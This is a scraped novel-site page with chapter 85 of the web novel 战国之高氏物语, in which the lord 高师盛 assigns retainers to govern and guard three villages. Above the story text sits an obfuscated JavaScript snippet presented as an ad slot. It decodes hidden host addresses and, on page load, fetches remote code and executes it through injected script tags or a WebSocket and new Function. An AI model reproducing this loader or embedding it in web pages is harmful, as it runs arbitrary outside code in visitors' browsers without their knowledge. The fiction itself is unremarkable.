笔趣阁

字:
关灯 护眼
笔趣阁 > 战国之高氏物语 > 第八十五章令召群豪参使厅
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第八十五章令召群豪参使厅

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
贺茂乡西临善秀寺,北接设乐原,野田城更是八名郡内有名的坚城。嵩山宿虽遭火灾,但毕竟示善秀寺的寺町,人口丰足,宿场更是繁华。
  
  每年光接待来往的香客便不知凡几,瞻仰寺中大佛,自然也会有进献供奉,过往善秀寺内的僧官只征收段钱这一项,便足有三四百贯钱之数,算上其他各类杂税就更多了。
  
  虽不见得比得上西三河号称‘岁入万贯劝进帐’的本证寺,但对於现在的高师盛来说,已经是一笔不小的岁入。
  
  嵩山宿在手,则能大大缓解军资不足带来的困窘,还可以如贺茂众那般牢牢监视住善秀寺内僧众的动向。长部乡正好位处贺茂、嵩山宿之间,且此乡过去的旧主乃是樱井松平氏,扶持松平忠继还归旧领,说出去也是顺理成章的事情。
  
  且其人怯懦软弱,高师盛也容易在背后进行操纵,不虞其会有反乱之举,这三个乡在郡内的位置都很重要,不能落于三河豪族的手中。
  
  高师盛以为然,问道:“如此,禅师又以为谁人可为此三乡的守备?”
  
  “嵩山宿临宝饭郡,临近多有寺社,乡人多为净土真宗门徒,务必选用亲信可靠之人任其町中奉行。野田城是贺茂众的本据,菅沼氏在乡中的朋党必然众多,待收取野田城后,当择一严猛尚威、明察内敏之人守备城防。长部乡处善秀寺与野田城之间,待松平玄蕃归家之后,可选一干练知兵之吏为其辅佐。”
  
  高师盛点了点头,笑对一色贞秀说道:“源太,你智勇兼备,又长于地方上的政务,可愿为我担任嵩山宿内的町奉行?”
  
  因为是以私人家臣的身份来监管嵩山宿,因而只说是担任町奉行,而非是骏府委任的役职。
  
  一色贞秀闻言惊喜,虽说他早就知道跟着高师盛必然前途远大,却没想到才到得八名郡几个月,便就能够出任这么一个财权兼具的町奉行,且还有负责监察善秀寺的职责,俨然是乡中代官了,他忙离席下拜,说道:“必不敢负判官所托!”
  
  高师盛笑着把他扶起,叫他坐回原位,说道:“善秀寺座主证莲,虽是庸碌无能之辈,至今仍旧忍气吞声,但寺中仍有诸多僧兵,不可就此小觑於他,更不能没有骁勇的武士来作为震慑,我意长冈右卫门领足轻五十人,再招募町中用心棒和浪人为助力,一同编为回见组,你以为如何?”
  
  毕竟现在兵力有限,不可能派遣太多人手在嵩山宿这边,将町中的用心棒和浪人收编也算是情理之中的事情。
  
  “悉从判官之令。”一色贞秀再次拜谢道。
  
  至于长冈右卫门则是无有所谓的态度,他在哪里都是一样,於他看来嵩山宿没有什么不好的地方,甚至从军纪方面来说,要比在中泉馆过得更舒坦一些,亦是起身大声应诺。
  
  高师盛招手示意大井盛朝取出早就写好的委任文书送给二人。
  
  此回提携一色贞秀,自然是怀有私心,毕竟嵩山宿如此重要的位置,放任别人来担任奉行高师盛终究是不放心,更主要的是手下可堪一用之人,且能够放心之人,却是不算多。
  
  小野忠明算一个,但却要留在身边以供随时商议大事,北庄盛忠也算一个,可惜回返远江国的平山乡了,剩下的诸多人手里面,便就是只有一色贞秀最为合适,不过他的武艺着实不精,所以配给了剽悍善战的长冈右卫门当与力。
  
  当然,如此做的安排当然也是为了分化配下各个武士团之间的隔阂,过往在中泉馆的这几个月内,虽然名义上诸人都同居馆城兵营之内,但相互之间并不算密切。
  
  而今同在一处奉公,相处的久了以后,关系自然也就密切了,一色贞秀虽然有些智谋,但生性宽纵豁达;长冈右卫门贪财轻死,算不上个什么好人,心思却不像彰义队内的另外两人那般狡诈无信。
  
  两人一同奉公,不会出现嫌隙仇怨,更不用担心长冈右卫门会跟善秀寺勾结一处为祸。
  
  嵩山宿交由一色贞秀、长冈右卫门来负责监护和守备,负责长部乡之人,高师盛选择了秋鹿仲麻吕。
  
  他笑对秋鹿仲麻吕说道:“仲麻吕,可愿为我守备长部乡?”
  
  秋鹿仲麻吕显然是必一色贞秀更加惊讶,转头向四周张望了几下,确认没有听错,才忙出列说道:“判官想让我去监领长部乡么?”
  
  “长年斋适才说,当选一干练知兵之吏替我守备住长部乡这个要地,我想来想去,现在也只有是你最合适了。”
  
  虽知高师盛这是虚赞之词,却丝毫无损秋鹿仲麻吕的欢喜之情,他连忙出席下拜,大声应诺:“仲麻吕悉从军令,必不敢负判官所托!”
  
  方才他听到一色贞秀两次的回答,觉得很是恭顺,干脆便学着以同样的话来回答。
  
  他是高师盛出阵信浓时的老部下了,合战也算勇敢,虽然现在升作骏府的兵曹,但实话实说过得当真很不如意,不然也不会被打发来八名郡这个随时都有可能再次爆发一向一揆的地方驻守。
  
  高师盛到任之前,他名义上是中泉馆的守备武将,实际上则是要看中泉寺监院和矢田家的脸色过活,不然连兵粮都要被断掉,高师盛到任之后,虽然将中泉馆的权利夺回,却也跟他没有了任何关系,还是干着看门守户的活,哪里比得上去乡里作代官来的痛快?
  
  因为他部下皆是远江国的旗本,书役、和军中的奉行都不缺,索性连与力都省了下来。
  
  议定了两乡负责的守备人选,天色已天光大亮,纷乱一夜未眠,诸人却均不困倦,反倒是因为收取郡南,而变得精神振奋。
  
  内藤光秀直到这个时候才终于是狼狈不堪回返嵩山宿,小野忠明嘱咐他的事情,显然是未能办好。
  
  带去差不多快二十名恶党,算上他在内才剩下四个,连一掌之数都不够,可能是中了敌人的火箭,内藤光秀的须发眉毛被烧了个干净,浑身血迹斑斑,脸上净是灰污,遮掩不住触目皆是的豆大火燎水泡。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师